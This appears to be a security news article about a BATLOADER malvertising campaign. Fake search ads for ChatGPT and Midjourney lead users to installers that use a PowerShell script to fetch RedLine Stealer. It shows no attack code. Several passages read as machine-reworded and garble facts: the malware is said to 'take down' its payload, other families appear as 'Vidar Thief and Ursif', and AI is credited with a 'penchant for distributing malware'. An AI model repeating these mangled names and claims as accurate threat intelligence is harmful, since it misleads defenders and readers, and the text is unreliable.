
Looking for an AI Tool? Beware of Rogue Sites Distributing RedLine Malware
Malicious Google Search Ads for generative AI services such as OpenAI ChatGPT and Midjourney are used to redirect users to cryptic websites as part of a BATLOADER campaign designed to deliver RedLine Stealer malware.
“Both AI services are very popular but lack first-party standalone applications (i.e. user interface with ChatGPT via their web interface while Midjourney uses Discord),” eSentire said in an analysis.
“This gap has been exploited by threat actors looking to redirect AI app finders to bogus web pages promoting bogus apps.”
BATLOADER is loader malware spread via drive-by download in which users who search for certain keywords in search engines are shown fake advertisements which, when clicked, redirect them to a malicious landing page that hosts the malware.
The installer file, per eSentire, comes with an executable file (ChatGPT.exe or midjourney.exe) and a PowerShell script (Chat.ps1 or Chat-Ready.ps1) that downloads and loads RedLine Stealer from a remote server.
After the installation is complete, the binary uses Microsoft Edge WebView2 to load chat.openai(.)com or www.midjourney(.)com – valid ChatGPT and Midjourney URLs – in a pop-up window so as not to raise red flags.

Adversaries’ use of ChatGPT and Midjourney themed baits to display malicious ads and eventually take down the RedLine Stealer malware was also highlighted last week by Trend Micro.

This is not the first time the operator behind BATLOADER has taken advantage of AI’s penchant for distributing malware. In March 2023, eSentire detailed a series of similar attacks that took advantage of ChatGPT feeds to deploy Vidar Thief and Ursif.
The cybersecurity firm further pointed out that Google Search ad abuse has fallen from its peak in early 2023, indicating that the tech giant is taking active steps to limit its exploitation.
Zero Trust + Deception: Learn How to Outsmart Attackers!
Discover how Fraud can detect advanced threats, stop lateral moves, and improve your Zero Trust strategy. Join our insightful webinar!
This finding comes a few weeks after Securonix uncovered phishing campaign dubbed OCX#HARVESTER targeting the cryptocurrency sector between December 2022 and March 2023 with More_eggs (aka Golden Chickens), a JavaScript downloader used to serve additional payloads.
eSentire, in January, traced the identity of one of the main malware-as-a-service (MaaS) operators to an individual located in Montreal, Canada. The second threat actor associated with the group is identified as a Romanian citizen who uses the alias Jack.